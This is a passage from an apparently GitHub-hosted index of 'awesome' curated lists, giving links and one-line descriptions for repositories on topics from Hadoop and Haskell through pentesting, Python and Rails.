[awesome-hacktoberfest-2020](https://github.com/Piyushhbhutoria/awesome-hacktoberfest-2020) – [Hacktoberfest](https://hacktoberfest.digitalocean.com/)-friendly repositories and resources. * [awesome-hadoop](https://github.com/youngwookim/awesome-hadoop) – Hadoop and Hadoop ecosystem resources. * [awesome-hardware-tools](https://github.com/aolofsson/awesome-hardware-tools) – Open-source hardware tools. * [awesome-haskell](https://github.com/krispo/awesome-haskell) * [awesome-hasura](https://github.com/aaronhayes/awesome-hasura) – [Hasura](https://hasura.io/) is an instant realtime GraphQL engine for PostgreSQL. * [awesome-haxe-gamedev](https://github.com/dvergar/awesome-haxe-gamedev) – Game development in [Haxe](https://haxe.org/) cross-platform programming language * [awesome-hbase](https://github.com/rayokota/awesome-hbase) – Apache HBase * [awesome-hdl](https://github.com/drom/awesome-hdl) – Hardware Description Languages * [awesome-healthcare](https://github.com/kakoni/awesome-healthcare) – Open source healthcare software, libraries, tools and resources. * [awesome-heroku](https://github.com/ianstormtaylor/awesome-heroku) – Heroku resources. * [awesome_hierarchical_matrices](https://github.com/gchavez2/awesome_hierarchical_matrices) – Hierarchical matrices frameworks, libraries, and software. * [awesome-home-assistant](https://github.com/frenck/awesome-home-assistant) – [Home Assistant](https://www.home-assistant.io/) home automation - https://awesome-ha.com * [awesome-homematic](https://github.com/homematic-community/awesome-homematic) – [HomeMatic](https://www.homematic.com/) home automation * [awesome-honeypots](https://github.com/paralax/awesome-honeypots) – Honeypot resources * [awesome-html5](https://github.com/diegocard/awesome-html5) * [awesome-htmx](https://github.com/rajasegar/awesome-htmx) – [htmx](https://htmx.org/) JavaScript library for building hypermedia-driven applications. * [awesome-http-benchmark](https://github.com/denji/awesome-http-benchmark) – HTTP(S) benchmark tools, testing/debugging, REST APIs. * [awesome-humane-tech](https://github.com/humanetech-community/awesome-humane-tech) – Promoting Solutions that Improve Wellbeing, Freedom and Society * [awesome-hydrogen](https://github.com/Shopify/awesome-hydrogen) – [Hydrogen](https://hydrogen.shopify.dev/) framework, based on React, for building Shopify-powered storefronts. * [awesome-hyper](https://github.com/bnb/awesome-hyper) – [Hyper](https://hyper.is/) terminal * [awesome-hyperscript](https://github.com/hyperhype/awesome-hyperscript) – [HyperScript](https://github.com/hyperhype/hyperscript) library for creating HTML with JavaScript. * [awesome-IAM](https://github.com/kdeldycke/awesome-iam) – User accounts, authentication and authorization. * [awesome-ibmcloud](https://github.com/victorshinya/awesome-ibmcloud) – IBM Cloud - https://awesome-ibmcloud.mybluemix.net * [awesome-icons](https://github.com/notlmn/awesome-icons) – Downloadable SVG/PNG/Font icon projects * [awesome-idris](https://github.com/joaomilho/awesome-idris) – 𝛌 [Idris](https://www.idris-lang.org/), functional programming language with dependent types * [awesome-incident-response](https://github.com/meirwah/awesome-incident-response) – Resources useful for incident responders. * [awesome-indie](https://github.com/mezod/awesome-indie) – Resources for independent developers to make money * [awesome-infinidash](https://github.com/joenash/awesome-infinidash) * [awesome-influxdb](https://github.com/mark-rushakoff/awesome-influxdb) – Resources for the time series database InfluxDB * [awesome-information-retrieval](https://github.com/harpribot/awesome-information-retrieval) – Information retrieval resources * [awesome-inspectit](https://github.com/inspectit-labs/awesome-inspectit) – InspectIT documentations and resources. * [awesome-integration](https://github.com/stn1slv/awesome-integration) – Sntegration software, patterns, and resources. * [AwesomeInterpreter](https://github.com/BaseMax/AwesomeInterpreter) – Open-source code interpreters on GitHub. * [awesome-interview-questions](https://github.com/MaximAbramchuck/awesome-interview-questions) – Interview questions. * [awesome-ionic](https://github.com/candelibas/awesome-ionic) – [Ionic](https://ionicframework.com/) mobile development framework * [awesome-ios](https://github.com/vsouza/awesome-ios) * [awesome-ios-cn](https://github.com/jobbole/awesome-ios-cn) _In Chinese_ – iOS 资源大全中文版,内容包括:框架、组件、测试、Apple Store、SDK、XCode、网站、书籍等 * [awesome-ios-ui](https://github.com/cjwirth/awesome-ios-ui) – UI/UX libraries for iOS. * [awesome-IoT](https://github.com/dharmeshkakadia/awesome-IoT) by @dharmeshkakadia – Internet of Things * [awesome-iot](https://github.com/HQarroum/awesome-iot) by @HQarroum – Internet of Things * [awesome-IoT-hybrid](https://github.com/weblancaster/awesome-IoT-hybrid) – Internet of Things and Hybrid Applications * [awesome-ipfs](https://github.com/ipfs/awesome-ipfs) – [IPFS](https://ipfs.io/) distributed web - https://awesome.ipfs.io/ * [awesome-irc](https://github.com/davisonio/awesome-irc) – Internet Relay Chat protocol. * [awesome-it-quotes](https://github.com/victorlaerte/awesome-it-quotes) – Collect all relevant quotes said over the history of IT * [awesome-jamstack](https://github.com/automata/awesome-jamstack) – [JAMstack](https://jamstack.org) (JavaScript, APIs, Markup) * [awesome-java](https://github.com/akullpp/awesome-java) * [awesome-javascript](https://github.com/sorrycc/awesome-javascript) * [awesome-javascript-books](https://github.com/heatroom/awesome-javascript-books) – Online and free JavaScript books. * [awesome-javascript-learning](https://github.com/micromata/awesome-javascript-learning) – Tiny list limited to the best JavaScript Learning Resources * [awesome-jitsi](https://github.com/easyjitsi/awesome-jitsi) – [Jitsi](https://jitsi.org/) open-source video conferencing. * [awesome-jmeter](https://github.com/aliesbelik/awesome-jmeter) – Apache JMeter load testing * [awesome-job-boards](https://github.com/emredurukn/awesome-job-boards) by @emredurukn * [awesome-job-boards](https://github.com/tramcar/awesome-job-boards) by @tramcar * [awesome-jquery](https://github.com/petk/awesome-jquery) * [awesome-js-drama](https://github.com/scottcorgan/awesome-js-drama) – JavaScript topics the just might spark the next revolt! * [awesome-json](https://github.com/burningtree/awesome-json) * [awesome-json-datasets](https://github.com/jdorfman/awesome-json-datasets) – JSON datasets that don't require authentication * [awesome-json-next](https://github.com/json-next/awesome-json-next) – What's Next for JSON for Structured (Meta) Data in Text. * [awesome-jsonschema](https://github.com/jviotti/awesome-jsonschema) – [JSON Schema](http://json-schema.org/). * [awesome-julia](https://github.com/melvin0008/awesome-julia) * [awesome-jupyter](https://github.com/markusschanta/awesome-jupyter) – [Jupyter](https://jupyter.org/) * [awesome-jvm](https://github.com/deephacks/awesome-jvm) * [awesome-kafka](https://github.com/monksy/awesome-kafka) – [Apache Kafka](http://kafka.apache.org/), distributed streaming platform * [awesome-katas](https://github.com/gamontal/awesome-katas) – Code katas * [awesome-kde](https://github.com/francoism90/awesome-kde) – KDE Desktop Environment. * [awesome-keepass](https://github.com/lgg/awesome-keepass) – [KeePass](https://keepass.info/) password manager and related projects. * [awesome-knockout](https://github.com/dnbard/awesome-knockout) – Plugins for Knockout MVVM framework. * [awesome-koa](https://github.com/ellerbrock/awesome-koa) – [Koa.js](https://koajs.com/) Web Framework - https://ellerbrock.github.io/awesome-koa * [awesome-koans](https://github.com/ahmdrefat/awesome-koans) – Programming kōans in various languages. * [awesome-kotlin](https://github.com/KotlinBy/awesome-kotlin) – [Kotlin](https://kotlinlang.org/) programming language - https://kotlin.link/ * [awesome-kotlin-native](https://github.com/bipinvaylu/awesome-kotlin-native) – Kotlin Multiplatform libraries & resources. * [awesome-kr-foss](https://github.com/darjeeling/awesome-kr-foss) – Korean open source projects. * [awesome-kubernetes](https://github.com/ramitsurana/awesome-kubernetes) - https://ramitsurana.github.io/awesome-kubernetes * [awesome-landing-page](https://github.com/nordicgiant2/awesome-landing-page) – Landing pages templates * [awesome-langchain](https://github.com/kyrolabs/awesome-langchain) – [LangChain](https://langchain.com/) LLM applications framework. * [awesome-laravel](https://github.com/chiraggude/awesome-laravel) by @chiraggude * [awesome-laravel](https://github.com/TimothyDJones/awesome-laravel) by @TimothyDJones * [Awesome-Laravel-Education](https://github.com/fukuball/Awesome-Laravel-Education) _In English and Chinese_ – Laravel PHP framework learning resources. * [awesome-latam](https://github.com/gophers-latam/awesome-latam) _In Spanish_ – Recursos en Español para desarrolladores de Golang. - https://gophers-latam.github.io/ * [awesome-LaTeX](https://github.com/egeerardyn/awesome-LaTeX) * [awesome-ld-preload](https://github.com/gaul/awesome-ld-preload) – LD_PRELOAD, a mechanism for changing application behavior at run-time. * [awesome-leading-and-managing](https://github.com/LappleApple/awesome-leading-and-managing) – Leading people and being a manager. Geared toward tech, but potentially useful to anyone. * [awesome-learn-datascience](https://github.com/siboehm/awesome-learn-datascience) – Resources to help you get started with Data Science * [awesome-learning-haskell](https://github.com/tweag/awesome-learning-haskell) * [awesome-learning-resources](https://github.com/lauragift21/awesome-learning-resources) – Learning Resources on Web Development. * [awesome-ledger](https://github.com/sfischer13/awesome-ledger) – Ledger command-line accounting system * [awesome-legacy-code](https://github.com/legacycoderocks/awesome-legacy-code) – Legacy systems with publicly available source code * [awesome-lemmy](https://github.com/dbeley/awesome-lemmy) – Useful apps, tools and websites for [Lemmy](https://join-lemmy.org/) federated social link aggregator. * [awesome-less](https://github.com/LucasBassetti/awesome-less) – Less CSS preprocessor * [awesome-lesscode](https://github.com/dream2023/awesome-lesscode) _In Chinese_ – Low code / no code projects * [awesome-libgdx](https://github.com/rafaskb/awesome-libgdx) – [libGDX](https://libgdx.badlogicgames.com/) cross-platform games development framework * [awesome-libgen](https://github.com/freereadorg/awesome-libgen) – Library Genesis, the world's largest free library. * [awesome-libra](https://github.com/learndapp/awesome-libra) by @learndapp – [Libra](https://libra.org/) cryptocurrency by Facebook * [awesome-libra](https://github.com/reed-hong/awesome-libra) by @reed-hong – [Facebook Diem](https://www.diem.com/) (née Libra) digital currency. * [awesome-librehosters](https://github.com/libresh/awesome-librehosters) – Nice hosting providers * [awesome-linguistics](https://github.com/theimpossibleastronaut/awesome-linguistics) – Tools, theory and platforms for linguistics. * [awesome-links](https://github.com/rbk/awesome-links) – Web Development Links by @richardbenjamin. * [awesome-linters](https://github.com/caramelomartins/awesome-linters) – Resources for a more literate programming. * [awesome-linux](https://github.com/aleksandar-todorovic/awesome-linux) – Linux software. * [awesome-linux-containers](https://github.com/Friz-zy/awesome-linux-containers) – Linux Containers frameworks, libraries and software * [awesome-linux-resources](https://github.com/itech001/awesome-linux-resources) - http://www.linux6.com * [Awesome-Linux-Software](https://github.com/luong-komorebi/Awesome-Linux-Software) – Linux applications for all users and developers. * [awesome-linuxaudio](https://github.com/nodiscc/awesome-linuxaudio) – Professional audio/video/live events production on Linux. * [awesome-lit-html](https://github.com/web-padawan/awesome-lit-html) – [lit-html](https://lit-html.polymer-project.org/) HTML templating library * [awesome-lite-websites](https://github.com/mdibaiee/awesome-lite-websites) – Lightweight versions of websites without all the bloat * [awesome-livecoding](https://github.com/toplap/awesome-livecoding) – All things Livecoding. * [Awesome-LLM](https://github.com/Hannibal046/Awesome-LLM) – Large Language Models * [awesome-llm-agents](https://github.com/kaushikb11/awesome-llm-agents) – Autonomous Large Language Model agents. * [awesome-lnurl](https://github.com/lnurl/awesome-lnurl) – [LNURL](https://github.com/lnurl/luds) (Lightning Network protocols) * [awesome-logging](https://github.com/roundrobin/awesome-logging) * [awesome-loginless](https://github.com/fiatjaf/awesome-loginless) – Internet services that don't require logins or registrations. * [awesome-logseq](https://github.com/logseq/awesome-logseq) – [Logseq](https://logseq.com/) personal knowledge management. * [awesome-love2d](https://github.com/love2d-community/awesome-love2d) – [LÖVE](http://love2d.org/) Lua game framework * [awesome-low-latency](https://github.com/penberg/awesome-low-latency) – Patterns and resources of low latency programming. * [awesome-lowcode](https://github.com/taowen/awesome-lowcode) _In Chinese_ – Chinese low code platforms. * [awesome-lua](https://github.com/forhappy/awesome-lua) by @forhappy * [awesome-lua](https://github.com/LewisJEllis/awesome-lua) by @LewisJEllis * [awesome-lumen](https://github.com/unicodeveloper/awesome-lumen) – [Lumen](https://lumen.laravel.com/), PHP Microframework by Laravel * [awesome-luvit](https://github.com/luvit/awesome-luvit) – [Luvit](https://luvit.io/), asynchronous I/O for Lua * [awesome-mac](https://github.com/jaywcjlove/awesome-mac) by @jaywcjlove – Premium macOS software in various categories - https://git.io/macx * [awesome-mac](https://github.com/xyNNN/awesome-mac) by @xyNNN – macOS tools, applications and games. * [awesome-mac-apps](https://github.com/justin-j/awesome-mac-apps) – macOS apps * [awesome-machine-learning](https://github.com/josephmisiti/awesome-machine-learning) * [awesome-macOS](https://github.com/iCHAIT/awesome-macOS) – OS X applications, tools and communities. * [awesome-macos-command-line](https://github.com/herrbischoff/awesome-macos-command-line) – Shell commands and tools specific to OS X. * [awesome-macos-screensavers](https://github.com/agarrharr/awesome-macos-screensavers) – Screensavers for Mac OS X * [awesome-mad-science](https://github.com/feross/awesome-mad-science) – npm packages that make you say "wow, didn't know that was possible!" * [awesome-magento2](https://github.com/DavidLambauer/awesome-magento2) – [Magento 2](https://magento.com/) PHP eCommerce platform - https://davidlambauer.github.io/awesome-magento2/ * [awesome-maintainers](https://github.com/nayafia/awesome-maintainers) – Talks, blog posts, and interviews about the experience of being an open source maintainer * [awesome-malware-analysis](https://github.com/rshipp/awesome-malware-analysis) * [awesome-manifestos](https://github.com/imsky/awesome-manifestos) – Interesting software manifestos and principles * [awesome-marionette](https://github.com/sadcitizen/awesome-marionette) – [marionette.js](https://marionettejs.com/) framework * [awesome-markdown](https://github.com/BubuAnabelas/awesome-markdown) * [awesome-markdown-alternatives](https://github.com/mundimark/awesome-markdown-alternatives) – Light-weight markup markdown alternatives. * [awesome-masonite](https://github.com/vaibhavmule/awesome-masonite) – [Masonite](https://docs.masoniteproject.com/) Python web framework * [awesome-mastodon](https://github.com/hueyy/awesome-mastodon) by @hueyy – [Mastodon](https://joinmastodon.org/) social media platform. * [awesome-mastodon](https://github.com/tleb/awesome-mastodon) by @tleb – [Mastodon](https://joinmastodon.org/) decentralized microblogging network * [awesome-material](https://github.com/sachin1092/awesome-material) – Google's material design * [Awesome-MaterialDesign](https://github.com/lightSky/Awesome-MaterialDesign) _In Chinese_ – Resources and libraries for [Material Design](http://www.google.com/design/spec/material-design/introduction.html). * [awesome-math](https://github.com/rossant/awesome-math) – Mathematics * [awesome-MATLAB](https://github.com/mikecroucher/awesome-MATLAB) * [awesome-matrix](https://github.com/jryans/awesome-matrix) by @jryans – [matrix.org](https://matrix.org/) ecosystem. * [awesome-matrix](https://github.com/rodolpheh/awesome-matrix) by @rodolpheh – [matrix.org](https://matrix.org/) ecosystem. * [awesome-mechanical-keyboard](https://github.com/BenRoe/awesome-mechanical-keyboard) – Mechanical Keyboards - https://keebfol.io * [awesome-media-archive](https://github.com/louiscenter/awesome-media-archive) – Open source tools for archiving audio & video data for offline usage. * [awesome-mesos](https://github.com/dharmeshkakadia/awesome-mesos) by @dharmeshkakadia * [awesome-mesos](https://github.com/parolkar/awesome-mesos) by @parolkar * [awesome-meteor](https://github.com/Urigo/awesome-meteor) * [awesome-meteor-developers](https://github.com/harryadel/awesome-meteor-developers) – Ways to support Meteor developers and packages. * [awesome-mews](https://github.com/MewsSystems/awesome-mews) – Resources Mews developers like and aligns with their vision. * [awesome-micro-npm-packages](https://github.com/parro-it/awesome-micro-npm-packages) – Small, focused npm packages. * [awesome-microbit](https://github.com/carlosperate/awesome-microbit) – BBC micro:bit * [awesome-microfrontends](https://github.com/ChristianUlbrich/awesome-microfrontends) * [awesome-microservices](https://github.com/mfornos/awesome-microservices) – Microservice Architecture related principles and technologies. * [awesome-minecraft](https://github.com/bs-community/awesome-minecraft) * [awesome-minimalist](https://github.com/neiesc/awesome-minimalist) – Minimalist frameworks (simple and lightweight). * [awesome-mobile](https://github.com/alec-c4/awesome-mobile) – Instruments for mobile marketing and development * [awesome-mobile-web-development](https://github.com/myshov/awesome-mobile-web-development) – All that you need to create a great mobile web experience * [awesome-modern-twitter-api](https://github.com/andypiper/awesome-modern-twitter-api) – Modern (post-v1.1) Twitter API. * [awesome-mongodb](https://github.com/ramnes/awesome-mongodb) * [awesome-monitoring](https://github.com/crazy-canux/awesome-monitoring) – INFRASTRUCTURE、OPERATION SYSTEM and APPLICATION monitoring tools for Operations. - http://canuxcheng.com/awesome-monitoring/ * [awesome-monte-carlo-tree-search-papers](https://github.com/benedekrozemberczki/awesome-monte-carlo-tree-search-papers) – Monte Carlo tree search, a heuristic search algorithm frequently used in games. * [awesome-motherfucking-website](https://github.com/lyoshenka/awesome-motherfucking-website) – Websites about minimal web design and copious swearing. * [awesome-motion-design-web](https://github.com/lucasmaiaesilva/awesome-motion-design-web) * [awesome-motion-planning](https://github.com/AGV-IIT-KGP/awesome-motion-planning) – Papers, books and tools for motion planning. * [awesome-mqtt](https://github.com/hobbyquaker/awesome-mqtt) – MQTT related stuff. * [awesome-msr](https://github.com/dspinellis/awesome-msr) – Empirical Software Engineering: evidence-based, data-driven research on software systems * [awesome-music](https://github.com/ciconia/awesome-music) – Music, audio, MIDI * [awesome-mysql](https://github.com/shlomi-noach/awesome-mysql) – MySQL software, libraries, tools and resources * [awesome-naming](https://github.com/gruhn/awesome-naming) – When naming things is done right. * [awesome-neo4j](https://github.com/neueda/awesome-neo4j) – Neo4j graph database * [awesome-netherlands-events](https://github.com/awkward/awesome-netherlands-events) – Dutch (tech related) events * [awesome-network-analysis](https://github.com/briatte/awesome-network-analysis) - http://f.briatte.org/r/awesome-network-analysis-list * [awesome-network-embedding](https://github.com/chihming/awesome-network-embedding) – Papers on node embedding techniques. * [awesome-network-js](https://github.com/Kikobeats/awesome-network-js) – Network layer resources in pure JavaScript * [Awesome-Networking](https://github.com/clowwindy/Awesome-Networking) * [awesome-neural-reprogramming-prompting](https://github.com/huckiyang/awesome-neural-reprogramming-prompting) – Adversarial reprogramming and input prompting methods for neural networks. * [awesome-neuroscience](https://github.com/analyticalmonk/awesome-neuroscience) – Neuroscience libraries, software and resources - http://akashtandon.com/awesome-neuroscience/ * [awesome-newsletters](https://github.com/mpron/awesome-newsletters) by @mpron – Developer newsletters * [awesome-newsletters](https://github.com/webpro/awesome-newsletters) by @webpro – The best (weekly) newsletters * [awesome-newsletters](https://github.com/zudochkin/awesome-newsletters) by @zudochkin * [awesome-nextjs](https://github.com/unicodeveloper/awesome-nextjs) – [Next.js](https://nextjs.org/) React-based JavaScript framework * [awesome-nim](https://github.com/VPashkov/awesome-nim) – [Nim](https://nim-lang.org/) programming language * [awesome-nix](https://github.com/nix-community/awesome-nix) – [Nix](https://github.com/nixos/nix), the purely functional package manager. * [awesome-nlp](https://github.com/keon/awesome-nlp) – Natural Language Processing. * [Awesome-no-code-tools](https://github.com/ElijT/Awesome-no-code-tools) * [awesome-no-login-web-apps](https://github.com/aviaryan/awesome-no-login-web-apps) – Web apps that work without login * [awesome-nocode](https://github.com/nslindtner/awesome-nocode) * [awesome-node-esm](https://github.com/talentlessguy/awesome-node-esm) – ES modules for Node.js * [awesome-nodejs](https://github.com/sindresorhus/awesome-nodejs) by @sindresorhus * [awesome-non-financial-blockchain](https://github.com/machinomy/awesome-non-financial-blockchain) – Non-financial applications of blockchain * [awesome-nosql-guides](https://github.com/erictleung/awesome-nosql-guides) – NoSQL databases - https://erictleung.com/awesome-nosql-guides/ * [awesome-notebooks](https://github.com/jupyter-naas/awesome-notebooks) – Ready to use data science templates. * [awesome-notion](https://github.com/spencerpauly/awesome-notion) – [Notion](https://www.notion.so/) * [awesome-npm](https://github.com/sindresorhus/awesome-npm) * [awesome-npm-scripts](https://github.com/RyanZim/awesome-npm-scripts) – using npm as a build tool * [awesome-ntnu](https://github.com/michaelmcmillan/awesome-ntnu) – Projects by NTNU students. * [awesome-nuxt](https://github.com/nuxt-community/awesome-nuxt) – Resources for [Nuxt.js](https://nuxtjs.org/), framework for universal Vue.js applications. * [awesome-objc-frameworks](https://github.com/follyxing/awesome-objc-frameworks) * [awesome-observables](https://github.com/sindresorhus/awesome-observables) – An Observable is a collection that arrives over time. * [awesome-obsidian](https://github.com/kmaasrud/awesome-obsidian) – [Obsidian](https://obsidian.md/) knowledge base app. * [awesome-ocaml](https://github.com/ocaml-community/awesome-ocaml) * [awesome-ocap](https://github.com/dckc/awesome-ocap) – Capability-based security enables the concise composition of powerful patterns of cooperation without vulnerability. * [awesome-offline](https://github.com/yangwao/awesome-offline) – Offline-first, progressive web applications (PWA). * [awesome-offline-rl](https://github.com/hanjuku-kaso/awesome-offline-rl) – Algorithms for offline reinforcement learning. * [awesome-okr](https://github.com/domenicosolazzo/awesome-okr) – Objective - Key Results, the best practice of setting and communicating company, team and employee objectives and measuring their progress based on achieved results * [awesome-online-ide](https://github.com/styfle/awesome-online-ide) – Online development environments - https://ide.ceriously.com * [awesome-online-machine-learning](https://github.com/MaxHalford/awesome-online-machine-learning) – [Online machine learning](https://en.wikipedia.org/wiki/Online_machine_learning) * [awesome-open-company](https://github.com/opencompany/awesome-open-company) – Open companies: Share as much as possible, charge as little as possible. * [awesome-open-science](https://github.com/silky/awesome-open-science) * [awesome-open-source-supporters](https://github.com/zachflower/awesome-open-source-supporters) – Companies that offer their services for free to Open Source projects * [awesome-openbudget](https://github.com/infoculture/awesome-openbudget) _In Russian_ – Open Budget government spending visualization. * [awesome-opengl](https://github.com/eug/awesome-opengl) – OpenGL libraries, debuggers and resources. * [awesome-opensource-data-engineering](https://github.com/gunnarmorling/awesome-opensource-data-engineering) * [awesome-opensource-documents](https://github.com/44bits/awesome-opensource-documents) – Open source or open source licensed documents, guides, books. * [awesome-OpenSourcePhotography](https://github.com/ibaaj/awesome-OpenSourcePhotography) – Free open source software & libraries for photography. Also tools for video. * [awesome-orgs](https://github.com/beansource/awesome-orgs) – GitHub Organizations. * [awesome-os](https://github.com/jubalh/awesome-os) – Open source operating systems and hobby operating systems. * [awesome-osc](https://github.com/amir-arad/awesome-osc) – [Open Sound Control](http://opensoundcontrol.org/) * [awesome-osint](https://github.com/jivoi/awesome-osint) – Open-source intelligence (OSINT) * [awesome-oss-alternatives](https://github.com/RunaCapital/awesome-oss-alternatives) – Open-source alternatives to established SaaS products. * [awesome-oss-investors](https://github.com/CrowdDotDev/awesome-oss-investors) – VCs investing in commercial open-source startups. * [awesome-oss-monetization](https://github.com/PayDevs/awesome-oss-monetization) – Monetization approaches for open-source software. * [awesome-pascal](https://github.com/Fr0sT-Brutal/awesome-pascal) – Delphi/FreePascal/(any)Pascal frameworks, libraries, resources, and shiny things. * [awesome-password-cracking](https://github.com/narkopolo/awesome-password-cracking) – Password cracking and password security. * [awesome-pcaptools](https://github.com/caesar0301/awesome-pcaptools) – Tools to process network traces. * [awesome-pentest](https://github.com/enaqx/awesome-pentest) – Penetration testing resources and tools. * [awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) – Penetration testing * [Awesome-People-in-Computer-Vision](https://github.com/solarlee/Awesome-People-in-Computer-Vision) * [awesome-perfocards](https://github.com/Wolg/awesome-perfocards) _See [perfokaart](https://et.wikipedia.org/wiki/Perfokaart)._ * [awesome-perl](https://github.com/hachiojipm/awesome-perl) * [awesome-persian](https://github.com/fffaraz/awesome-persian) – Persian/Farsi supporting tools, fonts, and development resources. * [awesome-personal-blogs](https://github.com/jkup/awesome-personal-blogs) – Personal tech blogs. * [awesome-phalcon](https://github.com/phalcon/awesome-phalcon) – [Phalcon](https://phalconphp.com/en/) PHP framework libraries and resources. * [awesome-pharo](https://github.com/pharo-open-documentation/awesome-pharo) – [Pharo](https://pharo.org/) Smalltalk * [awesome-pharo-ml](https://github.com/pharo-ai/awesome-pharo-ml) – Machine learning, AI, data science in Pharo. * [awesome-php](https://github.com/ziadoz/awesome-php) * [awesome-PICO-8](https://github.com/pico-8/awesome-PICO-8) – [PICO-8](https://www.lexaloffle.com/pico-8.php) fantasy console for making, sharing and playing tiny games - https://pico-8.github.io/awesome-PICO-8/ * [awesome-pinned-gists](https://github.com/matchai/awesome-pinned-gists) – Dynamic pinned gists for GitHub. * [awesome-pipeline](https://github.com/pditommaso/awesome-pipeline) – Pipeline toolkits. * [awesome-piracy](https://github.com/Igglybuff/awesome-piracy) – Warez and piracy links * [awesome-pixel-art](https://github.com/Siilwyn/awesome-pixel-art) * [awesome-plan9](https://github.com/henesy/awesome-plan9) * [awesome-play1](https://github.com/PerfectCarl/awesome-play1) – Play Framework 1.x modules, tools, and resources. * [awesome-plotters](https://github.com/beardicus/awesome-plotters) – Computer-controlled drawing machines and other visual art robots. * [awesome-podcasts](https://github.com/Ghosh/awesome-podcasts) by @Ghosh – Podcasts for designers, developers, product managers, entrepreneurs and hustlers - http://podcasts.surge.sh/ * [awesome-podcasts](https://github.com/rShetty/awesome-podcasts) by @rShetty – Important Podcasts for software engineers. * [awesome-pokemon](https://github.com/tobiasbueschel/awesome-pokemon) – Pokémon & Pokémon Go * [awesome-polymer](https://github.com/Granze/awesome-polymer) – [Polymer Project](https://www.polymer-project.org/) * [awesome-postcss](https://github.com/jdrgomes/awesome-postcss) – [PostCSS](https://postcss.org/) CSS processor * [awesome-postgres](https://github.com/dhamaniasad/awesome-postgres) * [awesome-power-mode](https://github.com/codeinthedark/awesome-power-mode) * [awesome-powershell](https://github.com/janikvonrotz/awesome-powershell) * [awesome-preact](https://github.com/preactjs/awesome-preact) – [Preact](https://github.com/preactjs/preact) JavaScript framework * [awesome-prisma](https://github.com/catalinmiron/awesome-prisma) – [Prisma](https://www.prisma.io/) GraphQL library * [awesome-privacy](https://github.com/lissy93/awesome-privacy) by @lissy93 – Privacy & security-focused software and services. - https://awesome-privacy.xyz * [awesome-privacy](https://github.com/pluja/awesome-privacy) by @pluja – Services and alternatives that respect your privacy because PRIVACY MATTERS. * [awesome-product-design](https://github.com/teoga/awesome-product-design) by @teoga – Bookmarks, resources, articles for product designers. * [awesome-product-design](https://github.com/ttt30ga/awesome-product-design) by @ttt30ga – Resources for product designers. * [awesome-product-management](https://github.com/dend/awesome-product-management) by @dend – Resources for product/program managers to learn and grow. * [Awesome-Product-Management](https://github.com/prakashsellathurai/Awesome-Product-Management) by @prakashsellathurai * [awesome-product-manager](https://github.com/yuhenobi/awesome-product-manager) * [awesome-productivity](https://github.com/jyguyomarch/awesome-productivity) – Delightful productivity resources. * [awesome-ProductManager](https://github.com/hugo53/awesome-ProductManager) – Books and tools for Product Managers. * [awesome-programming-for-kids](https://github.com/HollyAdele/awesome-programming-for-kids) – Teaching kids programming * [awesome-progressive-web-apps](https://github.com/TalAter/awesome-progressive-web-apps) – Progressive Web Apps (PWA) * [awesome-projects-boilerplates](https://github.com/melvin0008/awesome-projects-boilerplates) * [awesome-prolog](https://github.com/klaussinani/awesome-prolog) – Prolog logic programming language * [awesome-prometheus](https://github.com/roaldnefs/awesome-prometheus) – [Prometheus](https://prometheus.io/) monitoring system * [awesome-prometheus-alerts](https://github.com/samber/awesome-prometheus-alerts) – Prometheus alerting rules - https://awesome-prometheus-alerts.grep.to * [awesome-promises](https://github.com/wbinnssmith/awesome-promises) – JavaScript Promises. * [Awesome_Prompting_Papers_in_Computer_Vision](https://github.com/ttengwang/Awesome_Prompting_Papers_in_Computer_Vision) – Prompt-based papers in computer vision and vision-language learning. * [awesome-public-datasets](https://github.com/awesomedata/awesome-public-datasets) by @awesomedata – (Large-scale) public datasets on the Internet. - [source data](https://github.com/awesomedata/apd-core) * [awesome-puppet](https://github.com/rnelson0/awesome-puppet) * [awesome-pure-css-no-javascript](https://github.com/Zhangjd/awesome-pure-css-no-javascript) _In Chinese_ * [awesome-purescript](https://github.com/passy/awesome-purescript) * [awesome-pwa](https://github.com/hemanth/awesome-pwa) – Progressive web apps. * [awesome-pyramid](https://github.com/uralbash/awesome-pyramid) – Resources for Pyramid Python web framework. * [awesome-python](https://github.com/kevmo/awesome-python) by @kevmo * [awesome-python](https://github.com/vinta/awesome-python) by @vinta * [awesome-python-cn](https://github.com/jobbole/awesome-python-cn) _In Chinese_ * [awesome-python-data-science](https://github.com/krzjoa/awesome-python-data-science) * [awesome-python-htmx](https://github.com/PyHAT-stack/awesome-python-htmx) – Python-based web development using [htmx](https://htmx.org/) library. * [awesome-python-in-education](https://github.com/quobit/awesome-python-in-education) * [awesome-python-models](https://github.com/grundic/awesome-python-models) – List of ORMs, models, schemas, serializers, etc. libraries for python. * [awesome-python-scientific-audio](https://github.com/faroit/awesome-python-scientific-audio) – Python software and packages related to scientific research in audio * [awesome-python-talks](https://github.com/jhermann/awesome-python-talks) – Videos related to Python, with a focus on training and gaining hands-on experience. * [awesome-python-typing](https://github.com/typeddjango/awesome-python-typing) – Python types, stubs, plugins, and tools to work with them. * [Awesome-pytorch-list](https://github.com/bharathgs/Awesome-pytorch-list) – [PyTorch](https://pytorch.org/) Python machine learning framework. * [awesome-qa](https://github.com/seriousran/awesome-qa) – [Question Answering](https://en.wikipedia.org/wiki/Question_answering) systems automatically answer questions asked in a natural language * [awesome-qsharp](https://github.com/ebraminio/awesome-qsharp) – [Q#](https://docs.microsoft.com/en-us/quantum/) quantum programming language * [awesome-qt](https://github.com/JesseTG/awesome-qt) by @JesseTG – Qt framework * [awesome-qt](https://github.com/skhaz/awesome-qt) by @skhaz – Qt framework * [awesome-quantified-self](https://github.com/woop/awesome-quantified-self) – Devices, Wearables, Applications, and Platforms for Self Tracking * [awesome-quantum-computing](https://github.com/desireevl/awesome-quantum-computing) – Quantum computing learning and developing resources. * [awesome-quarantine](https://github.com/ishamsu/awesome-quarantine) * [awesome-R](https://github.com/qinwf/awesome-R) * [awesome-radio](https://github.com/kyleterry/awesome-radio) – Radio and citizens band (CB) radio resources. * [awesome-rails](https://github.com/dpaluy/awesome-rails) by @dpaluy * [awesome-rails](https://github.com/gramantin/awesome-rails) by @gramantin – Projects and sites made with Rails. * [awesome-rails](https://github.com/ruby-vietnam/awesome-rails) by @ruby-vietnam – Rails libraries/app examples/ebooks/tutorials/screencasts/magazines/news. * [awesome-rails-gem](https://github.com/hothero/awesome-rails-gem) – Ruby Gems for Rails development. * [awesome-random-forest](https://github.com/kjw0612/awesome-random-forest) – Decision forest, tree-based methods, including random forest, bagging, and boosting. * [awesome-raspberry-pi](https://github.com/blackout314/awesome-raspberry-pi) by 